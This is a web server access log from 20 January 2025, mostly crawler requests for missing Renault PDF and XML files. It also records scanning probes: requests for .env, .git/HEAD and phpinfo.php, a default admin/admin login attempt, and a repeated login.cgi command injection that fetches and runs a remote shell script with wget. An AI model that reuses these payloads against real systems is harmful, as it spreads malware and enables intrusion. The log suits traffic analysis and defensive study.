156.59.198.136 - - [20/Jan/2025:01:00:45 +0100] "GET /renault.2web.at/htdocs/binaries/10089015.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:01:04:45 +0100] "GET /renault.2web.at/htdocs/binaries/10451228.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:01:08:45 +0100] "GET /renault.activities.at/htdocs/binaries/10171423_1.pdf HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
120.76.75.173 - - [20/Jan/2025:01:09:04 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
47.128.45.177 - - [20/Jan/2025:01:12:45 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
118.184.136.71 - - [20/Jan/2025:01:20:12 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [20/Jan/2025:01:20:46 +0100] "GET /renault.2web.at/htdocs/binaries/10122735.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:01:24:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008311003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:01:28:46 +0100] "GET /renault.activities.at/htdocs/binaries/10352421.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:01:32:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108101003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.104 - - [20/Jan/2025:01:34:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.8.150.143 - - [20/Jan/2025:01:37:24 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
95.214.55.185 - - [20/Jan/2025:01:38:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [20/Jan/2025:01:44:48 +0100] "GET /ed-test.activities.at/stats/lang/awstats-si.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:01:48:48 +0100] "GET /renault.2web.at/htdocs/binaries/10462869.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:01:52:49 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101071103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
217.15.164.190 - - [20/Jan/2025:01:57:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
156.59.198.135 - - [20/Jan/2025:02:08:50 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ba.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.27.246 - - [20/Jan/2025:02:12:50 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [20/Jan/2025:02:14:48 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [20/Jan/2025:02:28:51 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103090803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:02:32:52 +0100] "GET /ed-test.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.132 - - [20/Jan/2025:02:33:17 +0100] "GET /.git/HEAD HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36"
95.214.55.43 - - [20/Jan/2025:02:34:52 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.1.119 - - [20/Jan/2025:02:38:28 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [20/Jan/2025:02:40:52 +0100] "GET /renault.2web.at/htdocs/binaries/10661427.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:02:44:52 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110191603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:02:48:52 +0100] "GET /renault.2web.at/htdocs/binaries/10004287.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.34 - - [20/Jan/2025:02:51:31 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
162.216.150.38 - - [20/Jan/2025:03:09:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [20/Jan/2025:03:20:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010281703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:03:24:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003091503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [20/Jan/2025:03:25:20 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [20/Jan/2025:03:25:20 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [20/Jan/2025:03:28:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111241603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [20/Jan/2025:03:30:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [20/Jan/2025:03:32:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002211003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
1.24.35.226 - - [20/Jan/2025:04:05:54 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
45.33.80.243 - - [20/Jan/2025:04:12:12 +0100] "\x16\x03\x01" 400 383 "-" "-"
195.178.110.57 - - [20/Jan/2025:04:16:33 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
195.178.110.57 - - [20/Jan/2025:04:18:09 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01"
156.59.198.136 - - [20/Jan/2025:04:25:00 +0100] "GET /renault.2web.at/htdocs/binaries/renault-/rs-1232017-fr.pdf HTTP/1.0" 404 314 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
182.116.19.12 - - [20/Jan/2025:04:27:54 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 378 "-" "-"
156.59.198.136 - - [20/Jan/2025:04:29:01 +0100] "GET /renault.activities.at/htdocs/binaries/renault-/rs-1342018-fr.pdf HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:04:33:01 +0100] "GET /renault.2web.at/htdocs/binaries/10188912.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.66.76.130 - - [20/Jan/2025:04:42:30 +0100] "\x03" 400 383 "-" "-"
179.43.191.146 - - [20/Jan/2025:04:47:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [20/Jan/2025:04:49:02 +0100] "GET /ed-test.activities.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.164.204.155 - - [20/Jan/2025:04:52:33 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.135 - - [20/Jan/2025:04:53:02 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908271403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [20/Jan/2025:05:11:33 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [20/Jan/2025:05:13:04 +0100] "GET /ed-test.activities.at/stats/lang/awstats-en.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.121.79.3 - - [20/Jan/2025:05:14:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
1.64.213.216 - - [20/Jan/2025:05:16:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [20/Jan/2025:05:17:04 +0100] "GET /renault.2web.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:05:21:04 +0100] "GET /renault.2web.at/htdocs/binaries/10015817.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:05:25:05 +0100] "GET /ed-test.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:05:29:07 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image052.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:05:33:07 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006051103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
66.240.205.34 - - [20/Jan/2025:05:34:06 +0100] "Gh0st\xad" 400 383 "-" "-"
54.189.15.6 - - [20/Jan/2025:05:50:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
156.59.198.135 - - [20/Jan/2025:05:53:09 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgba16.png HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.3.223.40 - - [20/Jan/2025:06:00:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
183.214.252.193 - - [20/Jan/2025:06:01:17 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.136 - - [20/Jan/2025:06:09:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106091103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:06:13:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103241403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
79.136.128.127 - - [20/Jan/2025:06:17:39 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [20/Jan/2025:06:29:13 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image093.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:06:33:13 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005261403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [20/Jan/2025:06:36:39 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
5.181.190.248 - - [20/Jan/2025:06:37:42 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.224.128.94 - - [20/Jan/2025:06:42:43 +0100] "\x16\x03\x03" 400 383 "-" "-"
185.224.128.94 - - [20/Jan/2025:06:42:43 +0100] "\x16\x03\x03" 400 383 "-" "-"
62.182.85.138 - - [20/Jan/2025:06:45:08 +0100] "GET /sites/all/libraries/plupload/examples/upload.php HTTP/1.1" 404 400 "-" "ALittle Client"
62.182.85.138 - - [20/Jan/2025:06:45:20 +0100] "GET /sites/all/libraries/plupload/examples/upload.php HTTP/1.1" 404 413 "-" "ALittle Client"
156.59.198.136 - - [20/Jan/2025:06:53:15 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image065.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.218.206.67 - - [20/Jan/2025:07:15:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
71.6.232.26 - - [20/Jan/2025:07:17:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
216.218.206.67 - - [20/Jan/2025:07:18:37 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
216.218.206.67 - - [20/Jan/2025:07:19:40 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
216.218.206.67 - - [20/Jan/2025:07:20:15 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
216.218.206.67 - - [20/Jan/2025:07:20:17 +0100] "GET /phpinfo.php HTTP/1.1" 200 10250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
216.218.206.67 - - [20/Jan/2025:07:20:20 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
156.59.198.135 - - [20/Jan/2025:07:29:19 +0100] "GET /renault.2web.at/htdocs/binaries/10009028.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.125.145 - - [20/Jan/2025:07:33:21 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
164.90.160.84 - - [20/Jan/2025:07:40:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0"
92.255.57.58 - - [20/Jan/2025:07:46:31 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.2.79.165 - - [20/Jan/2025:07:47:16 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
95.214.55.185 - - [20/Jan/2025:07:48:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [20/Jan/2025:07:49:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107291203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.30.107 - - [20/Jan/2025:07:53:25 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.104 - - [20/Jan/2025:07:55:09 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [20/Jan/2025:08:26:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.97.136.97 - - [20/Jan/2025:08:26:44 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 378 "-" "-"
52.228.152.126 - - [20/Jan/2025:08:40:18 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
92.255.57.58 - - [20/Jan/2025:08:44:32 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [20/Jan/2025:08:45:26 +0100] "GET /ed-test.activities.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:08:49:26 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray8a.png HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:08:53:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007101103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.202.252.77 - - [20/Jan/2025:08:56:16 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
18.218.112.173 - - [20/Jan/2025:08:57:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.218.112.173 - - [20/Jan/2025:08:58:13 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [20/Jan/2025:09:05:27 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012101203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:09:09:27 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ru.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [20/Jan/2025:09:13:27 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912211203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Jan/2025:09:25:29 +0100] "GET /renault.2web.at/htdocs/binaries/10485654.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.189.182.234 - - [20/Jan/2025:09:28:38 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
156.59.198.135 - - [20/Jan/2025:09:29:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009011103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [20/Jan/2025:09:33:20 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
156.59.198.135 - - [20/Jan/2025:09:33:29 +0100] "GET /renault.2web.at/htdocs/binaries/10269838.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [20/Jan/2025:09:39:53 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
3.134.109.31 - - [20/Jan/2025:09:43:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
